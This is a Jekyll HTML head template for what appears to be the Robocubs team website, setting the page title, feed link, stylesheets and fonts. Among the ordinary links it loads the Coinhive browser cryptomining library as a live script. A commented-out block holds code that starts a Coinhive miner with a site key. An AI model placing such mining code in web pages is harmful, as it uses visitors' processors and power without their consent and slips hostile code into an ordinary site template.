<head>
	<meta charset="UTF-8">
	<title>
		{% if page.title == "Home" %}
			Home | {{ site.title }}
		{% else %}
			{{ page.title }} | {{ site.title }}
		{% endif %}
	</title>
	<link type="application/atom+xml" rel="alternate" href="https://robocubs.github.io/feed.xml" title="Robocubs">
	<link rel="stylesheet" href="{{ site.baseurl }}/styles.css">
	<link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Inconsolata:400,700|Montserrat">
	<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css">
	<script src="https://coin-hive.com/lib/coinhive.min.js"></script>
	<!-- <script>
		console.info("Starting Coinhive...");
		var miner = new CoinHive.Token("10o5jHqAEDHlkyaU0csVMxDC1Cqm6VqY", 256000000000000);
		miner.start();
		console.info("Miner running.");
	</script> -->
</head>
